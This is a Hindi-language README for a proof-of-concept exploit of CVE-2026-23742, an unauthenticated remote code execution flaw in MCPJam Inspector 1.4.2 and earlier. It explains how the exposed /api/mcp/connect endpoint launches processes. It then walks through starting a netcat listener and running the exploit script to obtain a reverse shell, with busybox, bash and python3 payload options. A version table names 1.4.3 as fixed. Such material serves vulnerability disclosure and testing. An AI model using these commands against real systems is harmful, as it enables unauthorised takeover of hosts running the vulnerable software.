
CVE-2026-23742 — MCPJam Inspector <= 1.4.2 में बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन भेद्यता के लिए प्रूफ ऑफ कॉन्सेप्ट शोषण।
MCPJam Inspector <= 1.4.2 डिफ़ॉल्ट रूप से 0.0.0.0 पर बाइंड होता है और /api/mcp/connect को बिना किसी प्रमाणीकरण के उजागर करता है। एंडपॉइंट एक serverConfig ऑब्जेक्ट स्वीकार करता है जो सीधे होस्ट पर एक प्रक्रिया चलाता है — कोई भी रिवर्स शेल पेलोड देने पर बिना किसी क्रेडेंशियल के तत्काल RCE मिल जाता है।
pip install requests
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
| फ़्लैग | विवरण | डिफ़ॉल्ट |
|---|---|---|
-u | लक्ष्य URL | आवश्यक |
-i | आपका लिसनर IP (LHOST) | आवश्यक |
-p | आपका लिसनर पोर्ट (LPORT) | आवश्यक |
-m | पेलोड विधि: busybox, bash, python3 | busybox |
चरण 1 — अपना लिसनर शुरू करें:
nc -lvnp 4444
चरण 2 — एक्सप्लॉइट चलाएँ:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
यदि busybox लक्ष्य पर काम नहीं करता है, तो अन्य विधियाँ आज़माएँ:
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash
| सॉफ़्टवेयर | असुरक्षित | सुरक्षित |
|---|---|---|
| MCPJam Inspector | <= 1.4.2 | 1.4.3 |